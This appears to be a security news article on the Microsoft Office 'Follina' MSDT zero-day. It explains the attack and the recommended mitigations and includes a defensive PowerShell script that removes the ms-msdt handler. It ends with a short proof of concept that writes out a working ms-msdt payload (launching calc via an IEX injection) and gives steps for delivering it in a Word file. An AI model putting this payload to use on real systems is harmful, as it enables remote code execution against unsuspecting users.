Microsoft Office Zero-day (AKA ‘Follina’)
Security researchers have discovered a new zero-day vulnerability in Microsoft Office that attackers use to execute malicious PowerShell commands through the Microsoft Windows Support Diagnostic Tool (MSDT), triggered simply by opening a Word document, even in preview, read-only, or in Word with macros turned off. This zero-day is a new type of attack against Microsoft Office programs because it runs without requiring elevated privileges, bypasses Windows Defender detection, and does not need any macro code to run binaries or scripts.
Microsoft Office Zero day
“There is a pattern of attack which uses an external link in Word to load HTML, which is then executed via ‘ms-msdt’ to execute PowerShell code.”
The researchers further pointed out that Word documents can be dangerous if they are not checked before use. The attackers deliver the code through HTML and use Microsoft’s MS-MSDT URI format to run PowerShell. The researchers also added that the attack involves the Protected View feature in Microsoft Office, which is designed to warn users about corrupted Office files; the document can be dangerous once editing is enabled.
However, this feature may not be of much help if the attacker converts the document to an RTF (Rich Text Format) file, which can allow the attacker to run the script without requiring the victim to open the file. This attack is known as “zero-click exploitation.”
The researchers said the impact depends on the payload used by the attacker. For example, it could allow an attacker to collect a hash of the password of the victim’s Windows machine.
How to prevent it early
The researchers point out that protecting against this vulnerability is difficult because the attacker’s Word document has its payload set before it is sent to the recipient, which prevents the system from determining whether the file is malicious. They recommend disabling the MSDT URL protocol that attackers use to execute code, and disabling the Preview pane in Windows Explorer, since a payload can be triggered when a victim merely previews the document.
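As an added example, not code from the original post, the following PowerShell applies the first recommendation above on a single Windows host: it backs up and then removes the ms-msdt: URL protocol handler so that a document or preview can no longer hand a crafted URI to msdt.exe, and as defence in depth it enables the Microsoft Defender attack surface reduction rule that blocks Office applications from spawning child processes (the rule GUID is Microsoft’s published identifier). The backup file name is an assumption; the exported key can be restored with `reg import` once the system is patched.

```powershell
#Requires -RunAsAdministrator
# Added example (not from the original post). Removes the ms-msdt: protocol handler,
# which is what lets a Word document or RTF preview launch msdt.exe with attacker
# controlled parameters, and enables the Office child-process ASR rule.

$HandlerKey = 'Registry::HKEY_CLASSES_ROOT\ms-msdt'
# Backup location is an assumption; pick any path your change process requires.
$BackupFile = Join-Path $env:SystemDrive ("ms-msdt-backup-{0}.reg" -f (Get-Date -Format 'yyyyMMdd-HHmmss'))
# Microsoft's published GUID for "Block all Office applications from creating child processes".
$OfficeChildProcRule = 'D4F940AB-401B-4EFC-AADC-AD5F3C50688A'

if (Test-Path $HandlerKey) {
    # 1. Export the key first so the mitigation is reversible (reg import <file> restores it).
    reg.exe export 'HKEY_CLASSES_ROOT\ms-msdt' $BackupFile /y | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "Backup of the ms-msdt handler failed; aborting." }
    Write-Host "Backed up ms-msdt handler to $BackupFile"

    # 2. Delete the handler. Without it, ms-msdt: URIs no longer resolve to msdt.exe.
    Remove-Item -Path $HandlerKey -Recurse -Force
}

# 3. Verify the mitigation actually took effect.
if (Test-Path $HandlerKey) {
    throw 'ms-msdt handler is still present; mitigation was not applied.'
}
Write-Host 'ms-msdt URL protocol handler removed.'

# 4. Defence in depth: stop WINWORD.EXE and other Office apps from spawning children
#    such as msdt.exe, which also covers documents opened with macros disabled.
$enabledRules = (Get-MpPreference).AttackSurfaceReductionRules_Ids
if ($enabledRules -notcontains $OfficeChildProcRule) {
    Add-MpPreference -AttackSurfaceReductionRules_Ids $OfficeChildProcRule `
                     -AttackSurfaceReductionRules_Actions Enabled
}
Write-Host 'ASR rule "Block all Office applications from creating child processes" is enabled.'
```

The ASR rule can break legitimate workflows that launch programs from Office, so it is worth running it in Audit mode first and reviewing the Defender events before switching it to Enabled.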
Reported to Microsoft in April.
Researchers reported the vulnerability to Microsoft in April, but Microsoft viewed it as not a security-related issue. On April 12, Microsoft closed the vulnerability report (tracked as VULN-065524) and classified it as “This issue has been resolved”, despite its security implications for remote code execution.
POC
1. Start by setting up a web server and hosting a simple HTML page with this payload:
window.location.href = “ms-msdt:/id PCWDiagnostic /skip force /param \”IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX(‘calc.exe’))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \””;
2. Open the Word file with WinZip, go to word\rels\document.xml.rels and edit the IP address.
3. Finally, open the document and it will launch calc [if it does not work, save it as RTF and try again].